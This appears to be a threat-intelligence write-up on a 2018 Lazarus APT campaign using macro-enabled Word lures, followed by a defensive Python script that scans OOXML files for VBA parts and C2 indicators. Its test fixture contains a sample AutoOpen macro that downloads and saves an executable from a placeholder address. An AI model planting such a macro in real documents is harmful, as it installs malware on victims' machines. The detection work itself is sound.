November 2018: Lazarus group conducting APT attacks using servers in Korea and the United States

2018-11-13 ESTSecurity In November 2018, the Lazarus group was conducting APT attacks using servers in Korea and the United States.

http://blog.alyac.co.kr/1978


ESRC reports a Lazarus-linked APT operation that delivers malicious Microsoft Word documents disguised as cryptocurrency and fintech investment proposals. The documents ask the victim to enable macros; once enabled, the macro code contacts a website and installs additional malware. ESRC also identified a related series of RAT/backdoor executables compiled in November 2018 whose code structure matches samples observed in February. The activity appears to target victims mainly outside Korea, with some reports from South Africa, and ESRC notes that this regional exposure resembles earlier HIDDEN COBRA FASTCash reporting. The malware communicates with four C2 servers, two on South Korean and two on U.S. IP addresses, and some U.S.-hosted Windows servers were also used to distribute the malicious files. Code reuse, updated C2 addresses, encrypted internal routines, and possible Korean-language build-environment artifacts give defenders concrete pivots for tracking the operation.
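The macro-enabled Word lure described above is the kind of file a defender triages before it ever reaches a sandbox. The following is an added example, not code from the ESRC report: it builds a constructed, minimal OOXML container in memory (TEST-NET address 203.0.113.10 and the macro text are invented stand-ins, not the real C2 or lure content) and runs a structural triage over it: does the package carry a `word/vbaProject.bin` part, does `[Content_Types].xml` declare the macro-enabled main part, and which IPv4 addresses or URLs appear in the package once the standard OOXML schema namespaces are filtered out. Real `vbaProject.bin` parts store VBA source MS-OVBA-compressed inside an OLE container, so the string scan below only finds plain-text pivots; for real samples, decompress the VBA with a tool such as oletools' olevba before pivoting on C2 strings.

```python
import io
import re
import zipfile

# OOXML parts/content types that mark a macro-enabled Word document.
VBA_PART = "word/vbaProject.bin"
MACRO_CONTENT_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CONTENT_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"

# Namespace URLs present in every OOXML package; not pivots, so they are filtered out.
SCHEMA_PREFIXES = (
    b"http://schemas.openxmlformats.org/",
    b"http://schemas.microsoft.com/",
    b"http://www.w3.org/",
    b"http://purl.org/",
)

IPV4_RE = re.compile(
    rb"(?<![\d.])(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)(?![\d.])"
)
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def triage_office_doc(data: bytes) -> dict:
    """Return macro indicators and network pivots (IPv4, URLs) found in an OOXML package."""
    result = {
        "is_zip": False,
        "has_vba_project": False,
        "macro_content_type": False,
        "ipv4": [],
        "urls": [],
    }
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result  # not OOXML; legacy .doc (OLE2) needs a different parser
    result["is_zip"] = True
    ips, urls = set(), set()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        result["has_vba_project"] = VBA_PART in names
        if "[Content_Types].xml" in names:
            result["macro_content_type"] = (
                MACRO_CONTENT_TYPE.encode() in zf.read("[Content_Types].xml")
            )
        for name in names:
            blob = zf.read(name)  # raw bytes; compressed VBA source will not match here
            ips.update(m.decode() for m in IPV4_RE.findall(blob))
            urls.update(
                m.decode() for m in URL_RE.findall(blob)
                if not m.startswith(SCHEMA_PREFIXES)
            )
    result["ipv4"] = sorted(ips)
    result["urls"] = sorted(urls)
    return result


def build_sample_docm(macro: bool = True) -> bytes:
    """Constructed sample (not a real Lazarus lure): a minimal OOXML package, with or without a VBA part."""
    main_type = MACRO_CONTENT_TYPE if macro else PLAIN_CONTENT_TYPE
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
        + ('<Override PartName="/word/vbaProject.bin" '
           'ContentType="application/vnd.ms-office.vbaProject"/>' if macro else "")
        + "</Types>"
    )
    # Stand-in for vbaProject.bin holding plain text so the scan has something to find.
    # 203.0.113.10 is an RFC 5737 documentation address, not an observed C2.
    fake_vba = (
        b'Sub AutoOpen()\r\n'
        b'  URLDownloadToFile 0, "http://203.0.113.10/update.exe", '
        b'"C:\\Users\\Public\\update.exe", 0, 0\r\n'
        b'End Sub\r\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr(
            "word/document.xml",
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>',
        )
        if macro:
            zf.writestr(VBA_PART, fake_vba)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_office_doc(build_sample_docm()))
    print(triage_office_doc(build_sample_docm(macro=False)))
```

Both indicators should agree on a genuine macro document; a `vbaProject.bin` part without the macro-enabled content type (or the reverse) is itself worth a closer look, since it suggests a hand-edited package.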
